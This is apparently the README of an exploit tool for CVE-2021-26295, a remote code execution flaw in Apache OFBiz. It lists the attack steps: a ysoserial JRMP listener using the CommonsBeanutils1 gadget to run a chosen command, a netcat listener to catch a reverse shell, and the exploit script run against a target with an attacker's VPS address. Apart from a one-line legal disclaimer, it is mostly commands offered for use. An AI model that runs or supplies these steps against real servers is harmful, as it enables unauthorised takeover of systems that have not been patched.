
Exploit for CVE-2021-26295 (Apache OFBiz RCE) using ysoserial JRMP listener to execute commands and obtain a reverse shell on vulnerable targets.
CVE-2021-26295 EXP can successfully get a reverse shell
This article and tool are for technical sharing only. Any illegal use is strictly prohibited. The user shall bear all consequences.
RMI listener on port 9999java -cp ysoserial.jar ysoserial.exploit.JRMPListener 9999 CommonsBeanutils1 '[command to execute]'
nc listener on port 64444nc -lvp 64444
python3 cve-2021-26295_exp.py <target> <vps_ip> <vps_port>

